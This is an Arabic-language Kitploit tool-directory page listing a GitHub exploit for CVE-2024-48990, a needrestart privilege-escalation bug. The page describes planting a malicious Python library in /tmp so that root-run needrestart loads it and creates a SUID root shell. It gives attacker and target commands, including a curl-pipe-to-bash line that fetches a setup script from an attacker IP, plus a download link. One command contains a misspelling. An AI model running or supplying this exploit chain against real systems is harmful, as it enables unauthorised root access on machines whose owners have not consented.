Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-48990 — استغلال كامل لثغرة needsrestart للحصول على شل (shell) بصلاحيات الجذر (root) عبر setuid | Kitploit
أدوات/GitHubGitHub/mladicstefan/cve-2024-48990
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubmladicstefan/cve-2024-48990

CVE-2024-48990

استغلال كامل لثغرة needsrestart للحصول على شل (shell) بصلاحيات الجذر (root) عبر setuid

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2024-48990

تصعيد الامتيازات المحلي في needrestart < 3.8 عبر حقن PYTHONPATH.

كيف يعمل

  1. يعمل needrestart بصلاحيات root ويقوم بفحص جميع العمليات
  2. يعثر على عملية Python الخاصة بنا، ويقرأ PYTHONPATH=/tmp/.m من /proc/[pid]/environ
  3. يشغّل Python بصلاحيات root مع PYTHONPATH الخبيث الخاص بنا
  4. يحمّل استيراد Python ملف /tmp/.m/importlib/__init__.so (مكتبتنا الخبيثة)
  5. يتم تنفيذ المُنشئ في .so بصلاحيات root قبل أن يبدأ Python حتى
  6. ينشئ bash بصلاحيات SUID في /tmp/rootbash
  7. نفّذ /tmp/rootbash -p للحصول على صلاحيات root

نقطة أساسية: يثق needrestart في متغيرات البيئة القادمة من العمليات غير المميزة ويستخدمها عند تشغيل المفسرات بصلاحيات root.

الاستخدام

المهاجم:

root@kitploit:~
./compile.sh
python3 -m http.server 8000

الهدف:

root@kitploit:~
curl -sf http://10.10.14.109:8000/setup_exploit.sh | bash -s 10.10.14.109 8000
cd /tmp/.m && PYTHONPATH=/tmp/.m python3 e.py

يجب أن تعلق عملية e.py وتُطلق صلاحيات root بمجرد تشغيل الأمر التالي من طرفية ثانية:

root@kitploit:~
sudo needsrestard

الطرفية الأولى ستبدأ بصلاحيات root shell

الاعتمادات

Qualys Threat Research Unit - CVE-2024-48990

تنزيل الأداة